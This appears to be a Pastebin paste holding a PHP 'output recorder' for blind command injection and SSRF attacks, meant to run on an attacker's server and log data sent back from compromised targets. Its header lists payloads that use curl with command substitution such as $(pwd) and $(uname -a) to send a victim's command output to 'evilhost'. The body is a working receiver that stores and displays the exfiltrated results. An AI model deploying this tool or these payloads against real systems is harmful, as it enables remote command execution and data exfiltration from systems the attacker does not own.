zerobyte-id

Command Output Recorder (Blind RCE & SSRF)

May 16th, 2018
557
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3.     BLIND COMMAND INJECTION - OUTPUT RECORDER WITH CURL (WEB BASED)
  4.     Coded By ZeroByte.ID (Schopath)
  5.  
  6.     [+] Payload :
  7.     # curl -s "http://evilhost/cmd-read.php?cmd=$(pwd)";
  8.     # curl -s --data-urlencode "cmd=$(uname -a)" -X POST "http://evilhost/cmd-read.php"
  9. */
  10.  
  11. error_log(0);
  12. error_reporting(0);
  13.  
  14. $file = "cmdrec_".md5(date("Ymd")).".log";
  15.  
  16. if(!file_exists($file)) {
  17.     file_put_contents("$file", "");
  18. }
  19.  
  20. if(isset($_GET['cmd'])) {
  21.     $record = $_GET['cmd'];
  22.     $addcread = fopen($file, "a") or die("Failed open to open file!");
  23.     fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
  24.     fwrite($addcread, $record."\n");
  25.     fwrite($addcread, "----------------------------------------\n");
  26.     fclose($addcread);
  27. }
  28. else if (isset($_POST['cmd'])) {
  29.     $record = $_POST['cmd'];
  30.     $addcread = fopen($file, "a") or die("Failed open to open file!");
  31.     fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
  32.     fwrite($addcread, $record."\n");
  33.     fwrite($addcread, "----------------------------------------\n");
  34.     fclose($addcread);
  35. }
  36. else {
  37.     echo "<pre>\n";
  38.     echo "<b><big>##### BLIND COMMAND INJECTION - OUTPUT RECORDER #####</big></b><br>\n";
  39.     print_r(file_get_contents($file));
  40.     echo "</pre>\n";
  41.     echo "<form method=\"post\"><input type=\"submit\" name=\"reset\" value=\"Reset Log\"></form>";
  42.     if(isset($_POST['reset'])) {
  43.         $addcread = fopen($file, "w") or die("Failed open to open file!");
  44.         fwrite($addcread, "");
  45.         fclose($addcread);
  46.     }
  47. }
  48. ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×